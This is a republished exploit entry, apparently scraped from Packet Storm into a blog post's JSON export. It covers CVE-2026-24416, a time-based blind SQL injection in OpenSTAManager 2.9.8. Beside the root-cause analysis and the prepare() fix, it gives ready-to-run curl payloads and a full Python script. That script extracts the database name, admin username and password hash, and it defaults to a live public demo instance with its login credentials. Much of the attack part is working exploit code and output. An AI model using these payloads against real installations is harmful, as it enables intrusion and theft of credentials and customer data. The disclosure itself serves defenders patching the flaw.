{"id":46321,"date":"2026-04-13T11:50:40","date_gmt":"2026-04-13T11:50:40","guid":{"rendered":"http:\/\/localhost\/?p=46321"},"modified":"2026-04-13T11:50:40","modified_gmt":"2026-04-13T11:50:40","slug":"openstamanager-298-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=46321","title":{"rendered":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218745"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:50:59&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a remote time-based SQL injection vulnerability in the Article Pricing module&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218745&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24416&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-24416: OpenSTAManager has a Time-Based Blind SQL Injection in Article Pricing Module\\n    \\n    ## Overview\\n    \\n    | Field | Details |\\n    |&#8212;|&#8212;|\\n    | **CVE ID** | [CVE-2026-24416](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-24416) |\\n    | **Severity** | HIGH |\\n    | **Advisory** | [View Advisory](https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-p864-fqgv-92q4) |\\n    | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n    \\n    ## Affected Products\\n    \\n    &#8211; **devcode-it\/openstamanager** (versions: \\u003c= 2.9.8)\\n    \\n    \\n    ## CWE Classification\\n    \\n    &#8211; CWE-89: Improper Neutralization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)\\n    \\n    ## Details\\n    \\n    ### Summary\\n    \\n    Critical Time-Based Blind SQL Injection vulnerability in the article pricing module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer data, and financial records through time-based Boolean inference attacks.\\n    \\n    **Status:** \u2705 Confirmed and tested on live instance (v2.9.8) end [demo.osmbusiness.it](https:\/\/demo.osmbusiness.it\/) (v2.9.7)\\n    **Vulnerable Parameter:** `idarticolo` (GET)\\n    **Affected Endpoint:** `\/ajax_complete.php?op=getprezzi`\\n    **Affected Module:** Articoli (Articles\/Products)\\n    \\n    ### Details\\n    \\n    OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the article pricing completion handler. The application fails to properly sanitize the `idarticolo` parameter before using it in SQL queries, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.\\n    \\n    **Vulnerability Chain:**\\n    \\n    1. **Entry Point:** `\/ajax_complete.php` (Line 27)\\n       &#8220;`php\\n       $op = get(&#8216;op&#8217;);\\n       $result = AJAX::complete($op);\\n       &#8220;`\\n       The `op` parameter is retrieved but the vulnerability lies in other parameters.\\n    \\n    2. **Distribution:** `\/src\/AJAX.php::complete()` (Line 189)\\n       &#8220;`php\\n       $result = self::getCompleteResults($file, $resource);\\n       &#8220;`\\n    \\n    3. **Execution:** `\/src\/AJAX.php::getCompleteResults()` (Line 402)\\n       &#8220;`php\\n       require $file;\\n       &#8220;`\\n       Module-specific complete.php files are included.\\n    \\n    4. **Vulnerable Parameter:** `\/modules\/articoli\/ajax\/complete.php` (Line 26)\\n       &#8220;`php\\n       $idarticolo = get(&#8216;idarticolo&#8217;);\\n       &#8220;`\\n       The `idarticolo` parameter is retrieved from GET request.\\n    \\n    5. **Vulnerable SQL Query:** `\/modules\/articoli\/ajax\/complete.php` (Line 70) **PRIMARY VULNERABILITY**\\n       &#8220;`php\\n       FROM\\n           `dt_righe_ddt`\\n           INNER JOIN `dt_ddt` ON `dt_ddt`.`id` = `dt_righe_ddt`.`idddt`\\n           INNER JOIN `dt_tipiddt` ON `dt_tipiddt`.`id` = `dt_ddt`.`idtipoddt`\\n       WHERE\\n           `idarticolo`=&#8217;.$idarticolo.&#8217; AND\\n           `dt_tipiddt`.`dir`=\\&#8221;entrata\\&#8221; AND\\n           `idanagrafica`=&#8217;.prepare($idanagrafica).&#8217;\\n       &#8220;`\\n       **Impact:** Direct concatenation of `$idarticolo` without `prepare()`, while `$idanagrafica` is properly sanitized.\\n    \\n    **Context &#8211; Full Query Structure (Lines 39-74):**\\n    \\n    The vulnerable query is part of a UNION query that fetches pricing history from invoices and delivery notes:\\n    \\n    &#8220;`php\\n    $documenti = $dbo-\\u003efetchArray(&#8216;\\n        SELECT\\n            `iddocumento` AS id,\\n            \\&#8221;Fattura\\&#8221; AS tipo,\\n            \\&#8221;Fatture di vendita\\&#8221; AS modulo,\\n            (`subtotale`-`sconto`)\/`qta` AS costo_unitario,\\n            &#8230;\\n        FROM\\n            `co_righe_documenti`\\n            INNER JOIN `co_documenti` ON `co_documenti`.`id` = `co_righe_documenti`.`iddocumento`\\n            INNER JOIN `co_tipidocumento` ON `co_tipidocumento`.`id` = `co_documenti`.`idtipodocumento`\\n        WHERE\\n            `idarticolo`=&#8217;.prepare($idarticolo).&#8217; AND &#8230;  # \u2713 PROPERLY SANITIZED (Line 54)\\n    UNION\\n        SELECT\\n            `idddt` AS id,\\n            \\&#8221;Ddt\\&#8221; AS tipo,\\n            &#8230;\\n        FROM\\n            `dt_righe_ddt`\\n            INNER JOIN `dt_ddt` ON `dt_ddt`.`id` = `dt_righe_ddt`.`idddt`\\n            INNER JOIN `dt_tipiddt` ON `dt_tipiddt`.`id` = `dt_ddt`.`idtipoddt`\\n        WHERE\\n            `idarticolo`=&#8217;.$idarticolo.&#8217; AND   # \u2717 VULNERABLE &#8211; NO prepare() (Line 70)\\n            `dt_tipiddt`.`dir`=\\&#8221;entrata\\&#8221; AND\\n            `idanagrafica`=&#8217;.prepare($idanagrafica).&#8217;\\n    ORDER BY\\n        `id` DESC LIMIT 0,5&#8242;);\\n    &#8220;`\\n    \\n    **Root Cause:** Developer used `prepare()` correctly in the first SELECT (Line 54) but forgot to use it in the second SELECT of the UNION query (Line 70), creating an inconsistent security pattern.\\n    \\n    ### PoC\\n    \\n    **Step 1: Login**\\n    &#8220;`bash\\n    curl -c \/tmp\/cookies.txt -X POST &#8216;http:\/\/localhost:8081\/index.php?op=login&#8217; \\\\\\n      -d &#8216;username=admin\\u0026password=admin&#8217;\\n    &#8220;`\\n    \\n    **Step 2: Verify Vulnerability (Time-Based SLEEP)**\\n    &#8220;`bash\\n    # Test with SLEEP(10)\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      \\&#8221;http:\/\/localhost:8081\/ajax_complete.php?op=getprezzi\\u0026idanagrafica=1\\u0026idarticolo=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(10)))a)\\&#8221; \\\\\\n      \\u003e \/dev\/null\\n    # Result: real 0m10.32s (10.32 seconds)\\n    \\n    # Test with SLEEP(3) &#8211; should take ~3 seconds\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      \\&#8221;http:\/\/localhost:8081\/ajax_complete.php?op=getprezzi\\u0026idanagrafica=1\\u0026idarticolo=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(3)))a)\\&#8221; \\\\\\n      \\u003e \/dev\/null\\n    # Result: real 0m3.36s (3.36 seconds)\\n    \\n    # Test without SLEEP\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      \\&#8221;http:\/\/localhost:8081\/ajax_complete.php?op=getprezzi\\u0026idanagrafica=1\\u0026idarticolo=1\\&#8221; \\\\\\n      \\u003e \/dev\/null\\n    # Result: real 0m0.31s (0.31 seconds)\\n    &#8220;`\\n    \\u003cimg width=\\&#8221;1123\\&#8221; height=\\&#8221;536\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/4f5c56d8-db60-44dd-a52c-35314be4b4ed\\&#8221; \/\\u003e\\n    \\n    **Step 3: Data Extraction &#8211; Database Name**\\n    &#8220;`bash\\n    # Extract first character of database name\\n    # Test if first char is &#8216;o&#8217; (expected: TRUE for &#8216;openstamanager&#8217;)\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      \\&#8221;http:\/\/localhost:8081\/ajax_complete.php?op=getprezzi\\u0026idanagrafica=1\\u0026idarticolo=1%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)\\&#8221; \\\\\\n      \\u003e \/dev\/null\\n    # Result: real 0m2.34s (SLEEP executed &#8211; condition TRUE)\\n    \\n    # Test if first char is &#8216;x&#8217; (expected: FALSE)\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      \\&#8221;http:\/\/localhost:8081\/ajax_complete.php?op=getprezzi\\u0026idanagrafica=1\\u0026idarticolo=1%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)\\&#8221; \\\\\\n      \\u003e \/dev\/null\\n    # Result: real 0m0.31s (SLEEP not executed &#8211; condition FALSE)\\n    \\n    # Extract second character (expected: &#8216;p&#8217;)\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      \\&#8221;http:\/\/localhost:8081\/ajax_complete.php?op=getprezzi\\u0026idanagrafica=1\\u0026idarticolo=1%20AND%20SUBSTRING(DATABASE(),2,1)=%27p%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)\\&#8221; \\\\\\n      \\u003e \/dev\/null\\n    # Result: real 0m2.34s (SLEEP executed &#8211; confirms second char is &#8216;p&#8217;)\\n    \\n    # Extract first 3 characters (expected: &#8216;ope&#8217;)\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      \\&#8221;http:\/\/localhost:8081\/ajax_complete.php?op=getprezzi\\u0026idanagrafica=1\\u0026idarticolo=1%20AND%20SUBSTRING(DATABASE(),1,3)=%27ope%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)\\&#8221; \\\\\\n      \\u003e \/dev\/null\\n    # Result: real 0m2.33s (SLEEP executed &#8211; confirms &#8216;ope&#8230;&#8217;)\\n    &#8220;`\\n    \\n    **Step 4: Extract Sensitive Data &#8211; Admin Credentials**\\n    &#8220;`bash\\n    # Extract admin username (test if first 5 chars are &#8216;admin&#8217;)\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      \\&#8221;http:\/\/localhost:8081\/ajax_complete.php?op=getprezzi\\u0026idanagrafica=1\\u0026idarticolo=1%20AND%20(SELECT%20SUBSTRING(username,1,5)%20FROM%20zz_users%20WHERE%20id=1)=%27admin%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)\\&#8221; \\\\\\n      \\u003e \/dev\/null\\n    # Result: real 0m2.33s (SLEEP executed &#8211; confirms admin username)\\n    \\n    # Extract first character of password hash (expected: &#8216;$&#8217; for bcrypt)\\n    time curl -s -b \/tmp\/cookies.txt \\\\\\n      \\&#8221;http:\/\/localhost:8081\/ajax_complete.php?op=getprezzi\\u0026idanagrafica=1\\u0026idarticolo=1%20AND%20(SELECT%20SUBSTRING(password,1,1)%20FROM%20zz_users%20WHERE%20id=1)=%27%24%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)\\&#8221; \\\\\\n      \\u003e \/dev\/null\\n    # Result: real 0m2.33s (SLEEP executed &#8211; confirms bcrypt hash format)\\n    &#8220;`\\n    \\n    **Payload Explanation:**\\n    &#8220;`\\n    Original payload: 1 AND SUBSTRING(DATABASE(),1,1)=&#8217;o&#8217; AND (SELECT 1 FROM (SELECT(SLEEP(2)))a)\\n    URL-encoded: 1%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)\\n    \\n    Injection breakdown:\\n    1. 1 &#8211; Valid article ID\\n    2. AND SUBSTRING(DATABASE(),1,1)=&#8217;o&#8217; &#8211; Boolean condition to test\\n    3. AND (SELECT 1 FROM (SELECT(SLEEP(2)))a) &#8211; Execute SLEEP(2) if condition is true\\n    \\n    SQL Query Result:\\n    WHERE\\n        `idarticolo`=1\\n        AND SUBSTRING(DATABASE(),1,1)=&#8217;o&#8217;\\n        AND (SELECT 1 FROM (SELECT(SLEEP(2)))a)\\n        AND `dt_tipiddt`.`dir`=\\&#8221;entrata\\&#8221;\\n        AND `idanagrafica`=1\\n    &#8220;`\\n    \\n    **Automated Extraction Script Example:**\\n    &#8220;`python\\n    import requests\\n    import time\\n    import string\\n    import sys\\n    \\n    # Default Configuration\\n    BASE_URL = \\&#8221;https:\/\/demo.osmbusiness.it\\&#8221;\\n    USERNAME = \\&#8221;demo\\&#8221;\\n    PASSWORD = \\&#8221;demodemo1\\&#8221;\\n    SLEEP_TIME = 3  # Increased to 3s for stability on remote demo instance\\n    \\n    def login(session, base_url, user, pwd):\\n        \\&#8221;\\&#8221;\\&#8221;Authenticates to the application and maintains session.\\&#8221;\\&#8221;\\&#8221;\\n        login_url = f\\&#8221;{base_url}\/index.php?op=login\\&#8221;\\n        data = {\\&#8221;username\\&#8221;: user, \\&#8221;password\\&#8221;: pwd}\\n        \\n        print(f\\&#8221;[*] Attempting login to: {login_url}&#8230;\\&#8221;)\\n        try:\\n            response = session.post(login_url, data=data, timeout=10)\\n            # Check if login was successful (usually indicated by presence of logout link or redirect)\\n            if \\&#8221;logout\\&#8221; in response.text.lower() or response.status_code == 200:\\n                print(\\&#8221;[+] Login successful!\\&#8221;)\\n                return True\\n            else:\\n                print(\\&#8221;[-] Login failed. Please check credentials.\\&#8221;)\\n                return False\\n        except Exception as e:\\n            print(f\\&#8221;[!] Connection error: {e}\\&#8221;)\\n            return False\\n    \\n    def extract_data(session, base_url, sql_query, label=\\&#8221;Data\\&#8221;):\\n        \\&#8221;\\&#8221;\\&#8221;Extracts data character by character until the end of the string is reached.\\&#8221;\\&#8221;\\&#8221;\\n        print(f\\&#8221;\\\\n[*] Extracting: {label}&#8230;\\&#8221;)\\n        result = \\&#8221;\\&#8221;\\n        position = 1\\n        target_endpoint = f\\&#8221;{base_url}\/ajax_complete.php\\&#8221;\\n        \\n        # Charset optimized for database names and bcrypt hashes ($, ., \/)\\n        charset = string.ascii_letters + string.digits + \\&#8221;$.\/\\&#8221; + string.punctuation\\n    \\n        while True:\\n            found_char = False\\n            for char in charset:\\n                # Payload: If the condition is true, the server sleeps for SLEEP_TIME\\n                # Using ORD() and SUBSTRING() to handle various character types safely\\n                payload = f\\&#8221;1 AND (SELECT 1 FROM (SELECT IF(ORD(SUBSTRING(({sql_query}),{position},1))={ord(char)},SLEEP({SLEEP_TIME}),0))a)\\&#8221;\\n                \\n                params = {\\n                    \\&#8221;op\\&#8221;: \\&#8221;getprezzi\\&#8221;,\\n                    \\&#8221;idanagrafica\\&#8221;: \\&#8221;1\\&#8221;,\\n                    \\&#8221;idarticolo\\&#8221;: payload\\n                }\\n    \\n                try:\\n                    start_time = time.time()\\n                    session.get(target_endpoint, params=params, timeout=SLEEP_TIME + 10)\\n                    elapsed = time.time() &#8211; start_time\\n    \\n                    if elapsed \\u003e= SLEEP_TIME:\\n                        result += char\\n                        found_char = True\\n                        sys.stdout.write(f\\&#8221;\\\\r[+] {label} [{position}]: {result}\\&#8221;)\\n                        sys.stdout.flush()\\n                        break\\n                except requests.exceptions.RequestException:\\n                    # Handle network jitter\/timeouts by retrying or continuing\\n                    continue\\n    \\n            # If no character from charset triggered a sleep, we&#8217;ve reached the end of the data\\n            if not found_char:\\n                print(f\\&#8221;\\\\n[!] End of string or no data found at position {position}.\\&#8221;)\\n                break\\n                \\n            position += 1\\n            \\n        return result\\n    \\n    def main():\\n        s = requests.Session()\\n        \\n        # Allow target URL to be passed as a command line argument\\n        target = sys.argv[1] if len(sys.argv) \\u003e 1 else BASE_URL\\n        \\n        if login(s, target, USERNAME, PASSWORD):\\n            # 1. Database name extraction\\n            db = extract_data(s, target, \\&#8221;SELECT DATABASE()\\&#8221;, \\&#8221;Database Name\\&#8221;)\\n            \\n            # 2. Admin username extraction\\n            user = extract_data(s, target, \\&#8221;SELECT username FROM zz_users WHERE id=1\\&#8221;, \\&#8221;Admin Username (id=1)\\&#8221;)\\n            \\n            # 3. Password hash extraction (Bcrypt hashes are ~60 chars; the loop handles this automatically)\\n            pwd_hash = extract_data(s, target, \\&#8221;SELECT password FROM zz_users WHERE id=1\\&#8221;, \\&#8221;Password Hash\\&#8221;)\\n    \\n            print(f\\&#8221;\\\\n\\\\n{&#8216;=&#8217;*35}\\&#8221;)\\n            print(f\\&#8221;         FINAL REPORT\\&#8221;)\\n            print(f\\&#8221;{&#8216;=&#8217;*35}\\&#8221;)\\n            print(f\\&#8221;Target URL: {target}\\&#8221;)\\n            print(f\\&#8221;Database:   {db}\\&#8221;)\\n            print(f\\&#8221;Username:   {user}\\&#8221;)\\n            print(f\\&#8221;Hash:       {pwd_hash}\\&#8221;)\\n            print(f\\&#8221;{&#8216;=&#8217;*35}\\&#8221;)\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        main()\\n    &#8220;`\\n    \\u003cimg width=\\&#8221;674\\&#8221; height=\\&#8221;476\\&#8221; alt=\\&#8221;image\\&#8221; src=\\&#8221;https:\/\/github.com\/user-attachments\/assets\/24173485-55a0-4224-9746-48786704bb73\\&#8221; \/\\u003e\\n    \\n    ### Impact\\n    \\n    \\n    **Affected Users:** All authenticated users with access to the article pricing functionality (typically users managing quotes, invoices, orders).\\n    \\n    **Recommended Fix:**\\n    \\n    **File:** `\/modules\/articoli\/ajax\/complete.php`\\n    \\n    **BEFORE (Vulnerable &#8211; Line 70):**\\n    &#8220;`php\\n    WHERE\\n        `idarticolo`=&#8217;.$idarticolo.&#8217; AND\\n        `dt_tipiddt`.`dir`=\\&#8221;entrata\\&#8221; AND\\n        `idanagrafica`=&#8217;.prepare($idanagrafica).&#8217;\\n    &#8220;`\\n    \\n    **AFTER (Fixed):**\\n    &#8220;`php\\n    WHERE\\n        `idarticolo`=&#8217;.prepare($idarticolo).&#8217; AND\\n        `dt_tipiddt`.`dir`=\\&#8221;entrata\\&#8221; AND\\n        `idanagrafica`=&#8217;.prepare($idanagrafica).&#8217;\\n    &#8220;`\\n    \\n    ### Credits\\n    Discovered by \u0141ukasz Rybak\\n    \\n    ## References\\n    \\n    &#8211; https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-p864-fqgv-92q4\\n    &#8211; https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-24416\\n    &#8211; https:\/\/github.com\/advisories\/GHSA-p864-fqgv-92q4\\n    \\n    \\n    ## Disclaimer\\n    \\n    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/218745&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.7,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/218745\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:50:59&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a remote time-based SQL injection vulnerability in the Article Pricing module&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218745&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24416&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-24416: OpenSTAManager has&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-46321","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218745 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=46321\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218745 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:50:59&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a remote time-based SQL injection vulnerability in the Article Pricing module&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218745&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24416&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-24416: OpenSTAManager has...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=46321\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-13T11:50:40+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46321#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46321\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218745\",\"datePublished\":\"2026-04-13T11:50:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46321\"},\"wordCount\":2149,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.7\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46321#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46321\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46321\",\"name\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218745 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-13T11:50:40+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46321#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46321\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46321#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218745\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero 